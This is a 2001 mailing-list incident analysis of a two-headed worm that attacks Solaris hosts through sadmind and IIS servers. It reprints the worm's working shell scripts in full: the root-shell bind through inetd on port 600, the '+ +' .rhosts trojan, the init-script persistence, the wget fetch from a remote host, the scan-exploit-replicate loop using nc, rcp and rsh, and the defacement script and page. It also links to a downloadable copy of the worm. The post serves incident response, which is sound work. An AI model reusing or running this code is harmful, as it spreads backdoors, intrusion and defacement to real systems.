Security Incidents mailing list archives
Two-Headed Worm - ChinaWorm (analysis)
From: sheib <sheib () mbox digsys bg>
Date: Mon, 05 Nov 2001 10:06:29 +0200
--/ TWO-HEADED WORM - CHINAWORM \--
Since Bugtraq, nor CERT haven't mentionted anything about it,
it appears that there is another worm spreading on the loose.
That's a new type of worm, because it attacks two type of systems
simultanouesly. That's where the two-headed meaning applies.
I will call it ChinaWorm since that's the name in the
index tree bellow. In fact, looks much more like a combined worm.
Its creator appears to be using sysadmcn () yahoo com cn where he
recieves the results of his work.
CW scans C and B class networks for Sun's Solaris
Sadmind vulnerability as well it does for vulnerable IIS hosts.
It parasitely lurks in them when it's able to break in.
When it builds a list with new hosts, it tries to replicate itself.
I've seen it before and I see it now. Just deciced to drop some
lines to make notice of it.
Many must have seen 111/tcp probes over their networks.
Nov 4 15:30:17 grind kernel: IN=ppp0 OUT= MAC= SRC=216.227.125.143
DST=x.y.z.p LEN=44 TOS=0x00 PREC=0x00 TTL=235 ID=47042
DF PROTO=TCP SPT=60014 DPT=111 WINDOW=8760 RES=0x00 SYN URGP=0
Nov 4 15:30:18 grind kernel: IN=ppp0 OUT= MAC= SRC=216.227.125.143
DST=x.y.z.p LEN=40 TOS=0x00 PREC=0x00 TTL=235 ID=47043
DF PROTO=TCP SPT=60014 DPT=111 WINDOW=8760 RES=0x00 RST URGP=0
The worm installs a primitive backdoor listening to 600/tcp on the
SunOS hosts that breaks into, so anyone is free to join.
A brief explanation of what found plus ``snapshots'' follows.
Some of the sources are published bellow, some are not but are available.
source host: 216.227.125.143
uname report:
SunOS jbod-lab 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-60
ps report:
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 Oct 31 ? 0:04 sched
root 1 0 0 Oct 31 ? 0:18 /etc/init -r
root 2 0 0 Oct 31 ? 0:00 pageout
root 3 0 1 Oct 31 ? 41:00 fsflush
root 641 1 0 Oct 31 ? 0:00 /usr/lib/saf/sac -t 300
root 380 1 0 Oct 31 ? 0:00 /usr/sbin/rpcbind
root 644 641 0 Oct 31 ? 0:00 /usr/lib/saf/ttymon
root 463 1 0 Oct 31 ? 0:00 /usr/lib/lpsched
root 412 1 0 Oct 31 ? 0:00 /usr/lib/nfs/statd
root 484 1 0 Oct 31 ? 0:00 /usr/lib/sendmail -bd -q1h
root 433 1 0 Oct 31 ? 0:57 /usr/sbin/syslogd -n -z 14
root 453 1 0 Oct 31 ? 0:06 /usr/sbin/nscd
root 407 1 0 Oct 31 ? 0:05 /usr/sbin/inetd -s
root 382 1 0 Oct 31 ? 0:00 /usr/sbin/keyserv
root 414 1 0 Oct 31 ? 0:00 /usr/lib/nfs/lockd
root 429 1 0 Oct 31 ? 0:00 /usr/lib/autofs/automountd
root 444 1 0 Oct 31 ? 0:00 /usr/sbin/cron
root 494 1 0 Oct 31 ? 0:00 /usr/lib/utmpd
root 481 1 0 Oct 31 ? 0:00 /usr/lib/power/powerd
root 519 1 0 Oct 31 ? 0:04 /usr/lib/osa/bin/arraymon
root 530 1 0 Oct 31 ? 0:00 /usr/lib/osa/bin/rdaemon
24 156
root 64 root 8848 1 0 Nov 01 ? 0:03
/usr/local/sbin/sshd
root 585 1 0 Oct 31 ? 0:00 /usr/sbin/vold
root 564 530 0 Oct 31 ? 0:00 /usr/lib/osa/bin/rdaemon
24 156
root 619 1 0 Oct 31 ? 0:00 /usr/lib/snmp/snmpdx -y
-c /etc/snmp/conf
root 632 1 0 Oct 31 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 634 1 0 Oct 31 ? 0:00 /usr/lib/dmi/snmpXdmid -s
jbod-lab
root 631 1 0 Oct 31 ? 0:00 /usr/lib/dmi/dmispd
root 642 1 0 Oct 31 console 0:00 /usr/lib/saf/ttymon -g -h
-p jbod-lab console login: -T sun -d
/dev/console -l
root 327 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/uniattack.sh
root 15620 1 0 02:02:05 ? 0:01 /usr/lib/osa/bin/parityck
-aqf
root 14241 338 0 06:48:32 ? 0:00 /dev/cuc/grabbb -t 3 -a
109.121.177.1 -b 109.121.177.50 80
root 14231 335 0 06:48:30 ? 0:00 /dev/cuc/grabbb -t 3 -a
193.68.183.151 -b 193.68.183.200 111
root 14225 311 0 06:48:29 ? 0:00 /dev/cuc/grabbb -t 3 -a
164.183.177.1 -b 164.183.177.50 111
root 14229 326 0 06:48:30 ? 0:00 /dev/cuc/grabbb -t 3 -a
65.124.177.1 -b 65.124.177.50 111
root 347 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/uniattack.sh
root 338 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/uniattack.sh
root 14246 345 0 06:48:32 ? 0:00 /dev/cuc/grabbb -t 3 -a
14.194.177.1 -b 14.194.177.50 111
root 345 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/sadmin.sh
root 335 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/sadmin.sh
root 326 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/sadmin.sh
root 314 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/uniattack.sh
root 13248 310 0 06:44:24 ? 0:00 /bin/sleep 300
root 310 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/time.sh
root 29908 1 0 05:27:45 ? 0:00 /usr/sbin/inetd -s /tmp/.f
root 14235 347 0 06:48:31 ? 0:00 /dev/cuc/grabbb -t 3 -a
109.216.177.1 -b 109.216.177.50 80
root 14216 314 0 06:48:28 ? 0:00 /dev/cuc/grabbb -t 3 -a
18.214.177.1 -b 18.214.177.50 80
root 311 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/sadmin.sh
root 14237 327 0 06:48:32 ? 0:00 /dev/cuc/grabbb -t 3 -a
195.209.179.151 -b 195.209.179.200 80
file index in /dev/cuc:
drwxr-xr-x 2 root bin 632 Apr 29 2001 ./
drwxr-xr-x 3 root bin 72 Nov 4 17:11 ../
-rwxr-xr-x 1 root bin 6556 Apr 26 2001 brute*
-rw-r--r-- 1 root bin 701440 May 8 23:31 chinaworm.tar
-rw-r--r-- 1 root bin 86 Apr 26 2001 cmd1.txt
-rw-r--r-- 1 root bin 655 Apr 29 2001 cmd2.txt
-rw-r--r-- 1 root root 349712 Apr 29 2001 core
-rwxr-xr-x 1 root bin 11828 Apr 25 2001 grabbb*
-rwxr-xr-x 1 root root 66164 Apr 29 2001 gzip*
-rw-r--r-- 1 root bin 413 Apr 26 2001 index.html
-rw-r--r-- 1 root root 349696 May 6 04:42 junk.tar
-rwxr-xr-x 1 root bin 28620 Apr 26 2001 nc*
-rwxr-xr-x 1 root bin 222608 May 7 21:01 pico*
-rw-r--r-- 1 root root 10 Apr 29 2001 pkgadd.txt
-rw-r--r-- 1 root bin 151 Apr 26 2001 ranip.pl
-rwxr-xr-x 1 root bin 1591 Apr 27 2001 sadmin.sh*
-rwxr-xr-x 1 root bin 14644 Apr 25 2001 sadmindex-sparc*
-rwxr-xr-x 1 root bin 217 Apr 26 2001 start.sh*
-rw-r--r-- 1 root bin 6387 May 24 00:48 test
-rwxr-xr-x 1 root bin 566 Apr 27 2001 time.sh*
-rw-r--r-- 1 root bin 350208 May 7 21:22 uni.tar
-rw-r--r-- 1 root bin 67798 Apr 26 2001 uniattack.pl
-rwxr-xr-x 1 root bin 645 Apr 26 2001 uniattack.sh*
-rwxr-xr-x 1 root root 136288 Apr 29 2001 wget*
brute - SPARC executable used to inject the folowing code into a solaris box
vulnerable to the sadmind vulnerability [bugtraq id n\a]:
echo 'pcserver stream tcp nowait root /bin/sh sh -i' > /tmp/.f;
/usr/sbin/inetd -s /tmp/.f; rm -f /tmp/.f;
The above would bind a rootshell on port 600/tcp
cmd1.txt - commands used to trojan a shell service, using rsh -lroot 'sh
-i'
tactic
/bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print
$6}'`/.rhosts
exit
cmd2.txt - will extract uni.tar & backdoor the system's init scripts;
further explanation below
/bin/tar -xvf /tmp/uni.tar
/bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
/bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
/bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
/bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
/bin/chmod 744 /etc/rc2.d/S71rpc
/dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz
http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz
/dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz
/bin/mkdir /usr/local
/bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d
/tmp/perl-5.005_03-sol26-sparc-local
/bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local
exit
core: ELF 32-bit MSB core file, SPARC, version 1, from 'sadmindex-sparc'
grabbb - network mapping utility
gzip, nc, pico & wget - common tools involved in the process of replication
index.html - obviously the creator of the worm, will probably want to
deface the site's contents:
<HTML><HEAD>
<BODY bgColor=black><BR><BR><BR><BR><BR><BR>
<TABLE width="100%">
<TBODY>
<TR>
<TD>
<P align=center><FONT color=red size=7>fuck USA Government</FONT></P>
<TR>
<TD>
<P align=center><FONT color=red size=7>fuck PoizonBOx</FONT></P>
<TR>
<TD>
<P align=center><FONT color=red size=4>contact:sysadmcn () yahoo com cn
</FONT></P></TR></TBODY></TABLE></BODY></HTML>
ranip.pl - used to allocate B,C ranges of ips
use Getopt::Long;
$addr[0] = int(rand(254)+1);
$addr[1] = int(rand(255));
$b_ip = "$addr[0].$addr[1]";
print $b_ip;
sadmin.sh - the most important part of the worm - will try to read the
``hacked'' list and try to distribute itself using rcp tactics.
while true
do
i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
j=0
while [ $j -lt 256 ];do
/dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt
j=`/bin/echo "$j+1"|/bin/bc`
done
iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
for ip in $iplist;do
/bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt
/bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1
if [ $? = 0 ];then
/dev/cuc/brute 3 $ip >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/tar -cvf /tmp/uni.tar /dev/cuc
/bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
/bin/echo $ip >> /dev/cub/sadminhack.txt
/bin/rm -f /tmp/uni.tar
fi
else
/dev/cuc/brute 4 $ip >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/tar -cvf /tmp/uni.tar /dev/cuc
/bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
/bin/echo $ip >> /dev/cub/sadminhack.txt
/bin/rm -f /tmp/uni.tar
fi
fi
fi
fi
/bin/rm -f /dev/cub/$i.rpc.txt
done
/bin/rm -f /dev/cub/$i.txt
done
sadmindex-sparc - the sadmind exploit, SPARC binary
start.sh - the initalizing tool:
#!/bin/sh
if [ ! -d /dev/cub ]; then
/bin/mkdir /dev/cub
fi
/bin/nohup /dev/cuc/time.sh &
i=1
while [ $i -lt 5 ]
do
/bin/nohup /dev/cuc/sadmin.sh &
/bin/nohup /dev/cuc/uniattack.sh &
i=`/bin/echo "$i+1"|/bin/bc`
done
test - output from sadmindex-sparc
time.sh - will check wheter it's done, and if so will try to overwite all
index.html documnts found on the host with the index document suppliedl.
#!/bin/sh
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1
while true
do
/bin/sleep 300
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2
/bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3
process=`/bin/awk '{print $2}' /dev/cub/tmp2`
for p in $process;do
/bin/grep $p /dev/cub/tmp3
if [ $? = 0 ];then
/bin/kill -9 $p
fi
done
/bin/cp /dev/cub/tmp2 /dev/cub/tmp1
i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l`
if [ $i -gt 2000 ];then
/bin/nohup /bin/find / -name "index.html" -exec /bin/cp
/dev/cuc/index.html {} \; &
/bin/rm -f /dev/cub/result.txt
fi
done
uniattack.pl - Nimda based perl port of the well known IIS exploit,
will perform all of the above stuff at once;
I'm concerned to paste it here. ~60K. A must see.
uniattack.sh - search for vulnerable IIS' from the list created.
#!/bin/sh
while true
do
i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
j=0
while [ $j -lt 256 ];do
/dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt
j=`/bin/echo "$j+1"|/bin/bc`
done
iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
for ip in $iplist;do
/usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt
done
rm -f /dev/cub/$i.txt
done
* A Copy of ChinaWorm is available at http://212.7.192.4/cw.tgz *
/sh
First rule of public speaking.
First, tell 'em what you're goin' to tell 'em;
then tell 'em;
then tell 'em what you've tole 'em.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Current thread:
- Two-Headed Worm - ChinaWorm (analysis) sheib (Nov 05)
- Re: Two-Headed Worm - ChinaWorm (analysis) Holger van Lengerich (Nov 05)
- Re: Two-Headed Worm - ChinaWorm (analysis) Dave Dittrich (Nov 05)